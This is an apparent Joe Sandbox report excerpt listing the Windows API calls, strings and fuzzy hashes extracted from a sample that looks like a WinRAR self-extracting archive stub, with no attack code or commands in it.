                                                                                                                                  • GetWindow.USER32(00000000,00000002), ref: 008AE58D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
• Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                                                                  • String ID: $%s:$CAPTION$d
                                                                                                                                  • API String ID: 2407758923-2512411981
                                                                                                                                  APIs
                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 008CCB66
                                                                                                                                    • Part of subcall function 008CC701: _free.LIBCMT ref: 008CC71E
                                                                                                                                    • Part of subcall function 008CC701: _free.LIBCMT ref: 008CC730
                                                                                                                                    • Part of subcall function 008CC701: _free.LIBCMT ref: 008CC742
                                                                                                                                    • Part of subcall function 008CC701: _free.LIBCMT ref: 008CC754
                                                                                                                                    • Part of subcall function 008CC701: _free.LIBCMT ref: 008CC766
                                                                                                                                    • Part of subcall function 008CC701: _free.LIBCMT ref: 008CC778
                                                                                                                                    • Part of subcall function 008CC701: _free.LIBCMT ref: 008CC78A
                                                                                                                                    • Part of subcall function 008CC701: _free.LIBCMT ref: 008CC79C
                                                                                                                                    • Part of subcall function 008CC701: _free.LIBCMT ref: 008CC7AE
                                                                                                                                    • Part of subcall function 008CC701: _free.LIBCMT ref: 008CC7C0
                                                                                                                                    • Part of subcall function 008CC701: _free.LIBCMT ref: 008CC7D2
                                                                                                                                    • Part of subcall function 008CC701: _free.LIBCMT ref: 008CC7E4
                                                                                                                                    • Part of subcall function 008CC701: _free.LIBCMT ref: 008CC7F6
                                                                                                                                  • _free.LIBCMT ref: 008CCB5B
                                                                                                                                    • Part of subcall function 008C8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,008CC896,?,00000000,?,00000000,?,008CC8BD,?,00000007,?,?,008CCCBA,?), ref: 008C8DE2
                                                                                                                                    • Part of subcall function 008C8DCC: GetLastError.KERNEL32(?,?,008CC896,?,00000000,?,00000000,?,008CC8BD,?,00000007,?,?,008CCCBA,?,?), ref: 008C8DF4
                                                                                                                                  • _free.LIBCMT ref: 008CCB7D
                                                                                                                                  • _free.LIBCMT ref: 008CCB92
                                                                                                                                  • _free.LIBCMT ref: 008CCB9D
                                                                                                                                  • _free.LIBCMT ref: 008CCBBF
                                                                                                                                  • _free.LIBCMT ref: 008CCBD2
                                                                                                                                  • _free.LIBCMT ref: 008CCBE0
                                                                                                                                  • _free.LIBCMT ref: 008CCBEB
                                                                                                                                  • _free.LIBCMT ref: 008CCC23
                                                                                                                                  • _free.LIBCMT ref: 008CCC2A
                                                                                                                                  • _free.LIBCMT ref: 008CCC47
                                                                                                                                  • _free.LIBCMT ref: 008CCC5F
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                  APIs
                                                                                                                                  • _wcslen.LIBCMT ref: 008B9736
                                                                                                                                  • _wcslen.LIBCMT ref: 008B97D6
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 008B97E5
                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 008B9806
                                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 008B982D
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                                                                                  • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                                                  • API String ID: 1777411235-4209811716
                                                                                                                                  • Opcode ID: 7c869b6a6ffc766191476c2a516b876cddb047aac6ed6a36725970fbee9751ab
                                                                                                                                  • Instruction ID: dbda94644af6486768b602d7baee983f2f45be7762ff16447db36a484c39bde3
                                                                                                                                  • Opcode Fuzzy Hash: 7c869b6a6ffc766191476c2a516b876cddb047aac6ed6a36725970fbee9751ab
                                                                                                                                  • Instruction Fuzzy Hash: 4831F5325083117BE725AF289C46FAB77A8FF52720F14011EF651D63D2EB74DA0983A6
                                                                                                                                  APIs
                                                                                                                                  • GetWindow.USER32(?,00000005), ref: 008BD6C1
                                                                                                                                  • GetClassNameW.USER32(00000000,?,00000800), ref: 008BD6ED
                                                                                                                                    • Part of subcall function 008B1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,008AC116,00000000,.exe,?,?,00000800,?,?,?,008B8E3C), ref: 008B1FD1
                                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 008BD709
                                                                                                                                  • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 008BD720
                                                                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 008BD734
                                                                                                                                  • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 008BD75D
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 008BD764
                                                                                                                                  • GetWindow.USER32(00000000,00000002), ref: 008BD76D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                                                                  • String ID: STATIC
                                                                                                                                  • API String ID: 3820355801-1882779555
                                                                                                                                  • Opcode ID: 0c7fab8f6cccb66ea08dd0a1517955bf263b90a118acf920f6b220891f87c668
                                                                                                                                  • Instruction ID: e02e327f0ba0ad287936e7343580510558f78adfdd32a52285d6c7dedfe09630
                                                                                                                                  • Opcode Fuzzy Hash: 0c7fab8f6cccb66ea08dd0a1517955bf263b90a118acf920f6b220891f87c668
                                                                                                                                  • Instruction Fuzzy Hash: DD1136721093107FE2306B749C4AFEF766CFF14701F00C121FA11E2292EE64CB0556AA
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 008C9705
                                                                                                                                    • Part of subcall function 008C8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,008CC896,?,00000000,?,00000000,?,008CC8BD,?,00000007,?,?,008CCCBA,?), ref: 008C8DE2
                                                                                                                                    • Part of subcall function 008C8DCC: GetLastError.KERNEL32(?,?,008CC896,?,00000000,?,00000000,?,008CC8BD,?,00000007,?,?,008CCCBA,?,?), ref: 008C8DF4
                                                                                                                                  • _free.LIBCMT ref: 008C9711
                                                                                                                                  • _free.LIBCMT ref: 008C971C
                                                                                                                                  • _free.LIBCMT ref: 008C9727
                                                                                                                                  • _free.LIBCMT ref: 008C9732
                                                                                                                                  • _free.LIBCMT ref: 008C973D
                                                                                                                                  • _free.LIBCMT ref: 008C9748
                                                                                                                                  • _free.LIBCMT ref: 008C9753
                                                                                                                                  • _free.LIBCMT ref: 008C975E
                                                                                                                                  • _free.LIBCMT ref: 008C976C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 1b6836bad02406da2e2a0a91f9cb33c36ea1ecf65d1e6fbd80c6895521da9349
                                                                                                                                  • Instruction ID: ad16cf3550b47d2ebaf963a9856e791c0a1e37f724ffe7bedcc53cc27c88159b
                                                                                                                                  • Opcode Fuzzy Hash: 1b6836bad02406da2e2a0a91f9cb33c36ea1ecf65d1e6fbd80c6895521da9349
                                                                                                                                  • Instruction Fuzzy Hash: D111C376140009EFCB01EF98D842ED93BB5FF14390B0251A9FB098F262DE32DA509B85
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                  • API String ID: 322700389-393685449
                                                                                                                                  • Opcode ID: 32d27c58ca49faafd90d4391e072443917a352fdb1738d03da5446dda15b0386
                                                                                                                                  • Instruction ID: 431ff77a863ba3213e2ba1a338c99ec83171536b0a300f91d5f5449e6f98fa72
                                                                                                                                  • Opcode Fuzzy Hash: 32d27c58ca49faafd90d4391e072443917a352fdb1738d03da5446dda15b0386
                                                                                                                                  • Instruction Fuzzy Hash: E1B11471800219AFCF25DFA8D881EAEBBB5FF14310F14815EF815AB252D735DA52CB92
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog.LIBCMT ref: 008A6FAA
                                                                                                                                  • _wcslen.LIBCMT ref: 008A7013
                                                                                                                                  • _wcslen.LIBCMT ref: 008A7084
                                                                                                                                    • Part of subcall function 008A7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 008A7AAB
                                                                                                                                    • Part of subcall function 008A7A9C: GetLastError.KERNEL32 ref: 008A7AF1
                                                                                                                                    • Part of subcall function 008A7A9C: CloseHandle.KERNEL32(?), ref: 008A7B00
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                                                                  • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                  • API String ID: 3122303884-3508440684
                                                                                                                                  • Opcode ID: bf39c88642e3b71ecf6eda9d797bc5c79a82ab56849099d8bf3c9bd65db66282
                                                                                                                                  • Instruction ID: 540b01b2d03489ade952f51139ca6f5c8c72e7b13dc14f1f16317fca850eb8bb
                                                                                                                                  • Opcode Fuzzy Hash: bf39c88642e3b71ecf6eda9d797bc5c79a82ab56849099d8bf3c9bd65db66282
                                                                                                                                  • Instruction Fuzzy Hash: B141E9B1D0474479FF20D7749C45FDE776CFF16304F000455F955E6A82D674AA449722
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 008A1316: GetDlgItem.USER32(00000000,00003021), ref: 008A135A
                                                                                                                                    • Part of subcall function 008A1316: SetWindowTextW.USER32(00000000,008D35F4), ref: 008A1370
                                                                                                                                  • EndDialog.USER32(?,00000001), ref: 008BB610
                                                                                                                                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 008BB637
                                                                                                                                  • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 008BB650
                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 008BB661
                                                                                                                                  • GetDlgItem.USER32(?,00000065), ref: 008BB66A
                                                                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 008BB67E
                                                                                                                                  • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 008BB694
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                                                                  • String ID: LICENSEDLG
                                                                                                                                  • API String ID: 3214253823-2177901306
                                                                                                                                  • Opcode ID: 708474aca76f1e6d1433b776a57725832cda5232760184908262d270034513a2
                                                                                                                                  • Instruction ID: 85006c1238fc95a6dded8b885cb75c2651e3770b7da238580269b94e74b148f3
                                                                                                                                  • Opcode Fuzzy Hash: 708474aca76f1e6d1433b776a57725832cda5232760184908262d270034513a2
                                                                                                                                  • Instruction Fuzzy Hash: 8A21B431218218BFE6215B76EC49FBB3B7DFB5BB45F014014F601E66A1CBA29D01E635
                                                                                                                                  APIs
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,74B4297F,00000001,00000000,00000000,?,?,008AAF6C,ROOT\CIMV2), ref: 008BFD99
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,008AAF6C,ROOT\CIMV2), ref: 008BFE14
                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 008BFE1F
                                                                                                                                  • _com_issue_error.COMSUPP ref: 008BFE48
                                                                                                                                  • _com_issue_error.COMSUPP ref: 008BFE52
                                                                                                                                  • GetLastError.KERNEL32(80070057,74B4297F,00000001,00000000,00000000,?,?,008AAF6C,ROOT\CIMV2), ref: 008BFE57
                                                                                                                                  • _com_issue_error.COMSUPP ref: 008BFE6A
                                                                                                                                  • GetLastError.KERNEL32(00000000,?,?,008AAF6C,ROOT\CIMV2), ref: 008BFE80
                                                                                                                                  • _com_issue_error.COMSUPP ref: 008BFE93
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1353541977-0
                                                                                                                                  APIs
                                                                                                                                  Similarity
                                                                                                                                  • API ID: H_prolog
                                                                                                                                  • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                                                                  • API String ID: 3519838083-3505469590
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog.LIBCMT ref: 008A9387
                                                                                                                                  • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 008A93AA
                                                                                                                                  • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 008A93C9
                                                                                                                                    • Part of subcall function 008AC29A: _wcslen.LIBCMT ref: 008AC2A2
                                                                                                                                    • Part of subcall function 008B1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,008AC116,00000000,.exe,?,?,00000800,?,?,?,008B8E3C), ref: 008B1FD1
                                                                                                                                  • _swprintf.LIBCMT ref: 008A9465
                                                                                                                                    • Part of subcall function 008A4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008A40A5
                                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 008A94D4
                                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 008A9514
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                                                                  • String ID: rtmp%d
                                                                                                                                  • API String ID: 3726343395-3303766350
                                                                                                                                  APIs
                                                                                                                                  • __aulldiv.LIBCMT ref: 008B122E
                                                                                                                                    • Part of subcall function 008AB146: GetVersionExW.KERNEL32(?), ref: 008AB16B
                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 008B1251
                                                                                                                                  • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 008B1263
                                                                                                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 008B1274
                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 008B1284
                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 008B1294
                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 008B12CF
                                                                                                                                  • __aullrem.LIBCMT ref: 008B1379
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1247370737-0
                                                                                                                                  APIs
                                                                                                                                  • _swprintf.LIBCMT ref: 008A2536
                                                                                                                                    • Part of subcall function 008A4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008A40A5
                                                                                                                                    • Part of subcall function 008B05DA: _wcslen.LIBCMT ref: 008B05E0
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                                                                  • String ID: ;%u$x%u$xc%u
                                                                                                                                  • API String ID: 3053425827-2277559157
                                                                                                                                  APIs
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcslen
                                                                                                                                  • String ID: </p>$</style>$<br>$<style>$>
                                                                                                                                  • API String ID: 176396367-3568243669
                                                                                                                                  APIs
                                                                                                                                  • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,008CFE02,00000000,00000000,00000000,00000000,00000000,?), ref: 008CF6CF
                                                                                                                                  • __fassign.LIBCMT ref: 008CF74A
                                                                                                                                  • __fassign.LIBCMT ref: 008CF765
                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 008CF78B
                                                                                                                                  • WriteFile.KERNEL32(?,00000000,00000000,008CFE02,00000000,?,?,?,?,?,?,?,?,?,008CFE02,00000000), ref: 008CF7AA
                                                                                                                                  • WriteFile.KERNEL32(?,00000000,00000001,008CFE02,00000000,?,?,?,?,?,?,?,?,?,008CFE02,00000000), ref: 008CF7E3
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1324828854-0
                                                                                                                                  APIs
                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 008C2937
                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 008C293F
                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 008C29C8
                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 008C29F3
                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 008C2A48
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                  • String ID: csm
                                                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                                                  • Opcode ID: 890b01927dca2cb18cb391713838d35a2243b8f02556a85ec2fc8bd6d8da4478
                                                                                                                                  • Instruction ID: 30f07cad83b384f764f7895540f985bd3afbfb7cda76d77569e807c36b412b87
                                                                                                                                  • Opcode Fuzzy Hash: 890b01927dca2cb18cb391713838d35a2243b8f02556a85ec2fc8bd6d8da4478
                                                                                                                                  • Instruction Fuzzy Hash: E9416B34A00219ABCF10DF69C885F9EBBB5FF44324F14816AE819EB392D771DA15CB91
                                                                                                                                  APIs
                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 008B9EEE
                                                                                                                                  • GetWindowRect.USER32(?,00000000), ref: 008B9F44
                                                                                                                                  • ShowWindow.USER32(?,00000005,00000000), ref: 008B9FDB
                                                                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 008B9FE3
                                                                                                                                  • ShowWindow.USER32(00000000,00000005), ref: 008B9FF9
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Show$RectText
                                                                                                                                  • String ID: RarHtmlClassName
                                                                                                                                  • API String ID: 3937224194-1658105358
                                                                                                                                  • Opcode ID: 4c472c693d7d716658acdc60435560c56e543fa0ca4708cadbf81cd15821bb7d
                                                                                                                                  • Instruction ID: 95d55e18a77bf9f085de7c04d66dd0d36e83b174e4433287a7d4054224a65d36
                                                                                                                                  • Opcode Fuzzy Hash: 4c472c693d7d716658acdc60435560c56e543fa0ca4708cadbf81cd15821bb7d
                                                                                                                                  • Instruction Fuzzy Hash: F241A03100C214EFCB616F64DC48BAB7FA8FF48711F008559F989D9266DB34D945DBA2
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcslen
                                                                                                                                  • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                                                  • API String ID: 176396367-3743748572
                                                                                                                                  • Opcode ID: 2215826e54c6bc961bdb7f2e75b81b6aba60ab90e26ae5cff54b65cc3641f5ff
                                                                                                                                  • Instruction ID: 785ac299ca4021eabc0345587f303ea9dac90d9eca2317654f2b1ba3d1a7ac37
                                                                                                                                  • Opcode Fuzzy Hash: 2215826e54c6bc961bdb7f2e75b81b6aba60ab90e26ae5cff54b65cc3641f5ff
                                                                                                                                  • Instruction Fuzzy Hash: A131492264435596DA30AB549C42BBA73B4FB90720F60842FFAD6D73C0FA64ED4183A2
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 008CC868: _free.LIBCMT ref: 008CC891
                                                                                                                                  • _free.LIBCMT ref: 008CC8F2
                                                                                                                                    • Part of subcall function 008C8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,008CC896,?,00000000,?,00000000,?,008CC8BD,?,00000007,?,?,008CCCBA,?), ref: 008C8DE2
                                                                                                                                    • Part of subcall function 008C8DCC: GetLastError.KERNEL32(?,?,008CC896,?,00000000,?,00000000,?,008CC8BD,?,00000007,?,?,008CCCBA,?,?), ref: 008C8DF4
                                                                                                                                  • _free.LIBCMT ref: 008CC8FD
                                                                                                                                  • _free.LIBCMT ref: 008CC908
                                                                                                                                  • _free.LIBCMT ref: 008CC95C
                                                                                                                                  • _free.LIBCMT ref: 008CC967
                                                                                                                                  • _free.LIBCMT ref: 008CC972
                                                                                                                                  • _free.LIBCMT ref: 008CC97D
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                                                  • Instruction ID: f68c3e0414e99b98ed23c7039636df7d21bf3ca3cbdd57fd0535ea33dc7f4af4
                                                                                                                                  • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                                                  • Instruction Fuzzy Hash: 5F11EA71580B04EAE520B7B9DC06FCB7BB8FF04B00F804829F3AEE6092DA75E5058752
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,008BE669,008BE5CC,008BE86D), ref: 008BE605
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 008BE61B
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 008BE630
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                  • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                                  • API String ID: 667068680-1718035505
                                                                                                                                  • Opcode ID: 26279a25dd0b7b237db7708aa4ea4a50a5693b0f320949f028683a186a98f56c
